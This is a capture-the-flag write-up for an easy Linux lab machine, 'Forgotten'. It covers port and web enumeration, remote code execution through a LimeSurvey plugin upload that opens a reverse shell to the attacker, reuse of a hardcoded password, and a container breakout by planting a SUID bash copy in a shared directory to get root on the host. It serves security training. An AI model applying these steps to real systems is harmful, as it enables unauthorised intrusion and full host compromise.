Skip to main content

Machine (Easy) - Forgotten

Writeup for the Forgotten machine, an easy Linux box focused on exploiting a misconfigured LimeSurvey instance.

Writeup Author: BobBuilder

Objective: Gain remote code execution through LimeSurvey, escape the container, and escalate privileges to root on the host.

Category Difficulty Platform Machine Author
Machine Easy Linux xct

Enumeration

nmap -sV -p- <forgotten_ip>
  • 22/tcp – OpenSSH 8.9p1 (Ubuntu)
  • 80/tcp – Apache httpd 2.4.56 (Debian), shows 403 Forbidden

User

Web Enumeration

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt:FUZZ -u http://<forgotten_ip>/FUZZ -fw 1
  • Discovered paths: /survey/, /server-status/
  • /survey/ leads to LimeSurvey installer

LimeSurvey Installation

  • Navigated to:
    http://<forgotten_ip>/survey/index.php?r=installer/welcome
  • Set up a local MySQL database with required privileges
  • Used default LimeSurvey admin credentials: 
    Username: admin  
Password: <REDACTED>

Remote Code Execution

Used exploit:
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE

Steps:

  • Edited php-rev.php to set attacker IP
  • Built and uploaded malicious plugin zip
  • Activated it via LimeSurvey UI
  • Triggered reverse shell: 
    http://<forgotten_ip>/survey/upload/plugins/Y1LD1R1M/php-rev.php

Enumeration with linPEAS

  • Discovered user: limesvc, part of the sudo group

  • Found hardcoded password:

    LIMESURVEY_PASS=***************

  • Verified sudo access:

    echo os.system('/bin/bash')
sudo -S su

    (Used password to become root in container)

  • Containerized environment (no host flag)

SSH to Host

ssh limesvc@<forgotten_ip>
  • Same credentials work
  • Retrieved user flag from host system

Root

Container Breakout via SUID Bash

On container:

cd /var/www/html/survey
cp /bin/bash bash
chmod +s bash

On host (as limesvc):

/opt/limesurvey/bash -p
  • Dropped into root shell:
bash-5.1# id
uid=2000(limesvc) gid=2000(limesvc) euid=0(root) egid=0(root)
Back to top